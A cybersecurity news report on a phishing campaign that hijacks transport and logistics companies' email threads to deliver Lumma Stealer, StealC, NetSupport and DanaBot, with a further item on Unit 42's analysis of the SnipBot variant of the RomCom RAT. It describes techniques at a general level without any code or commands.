Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).
The activity cluster, per Proofpoint, makes use of compromised legitimate email accounts belonging to transportation and shipping companies so as to inject malicious content into existing email conversations.
As many as 15 breached email accounts have been identified as used as part of the campaign. It's currently not clear how these accounts are infiltrated in the first place or who is behind the attacks.
"Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport," the enterprise security firm said in an analysis published Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains involve sending messages bearing internet shortcut (.URL) attachments or Google Drive URLs leading to a .URL file that when launched, uses Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
Some variants of the campaign observed in August 2024 have also latched onto a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of addressing an issue with displaying document content in the web browser.
Specifically, this involves urging users to copy and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the infection process.
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint said.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that's distributed via bogus links embedded within phishing emails. Some aspects of the campaign were previously highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
The latest version employs an extended set of 27 commands, allowing the operators to enumerate directory paths, run commands using cmd.exe, upload and download files, gather a list of running processes, set up a SOCKS proxy, and use 7-Zip to create an archive of the attacker-provided path.
While systems infected with RomCom have also witnessed ransomware deployments in the past, the cybersecurity company pointed out the absence of this behavior, raising the possibility that the threat behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.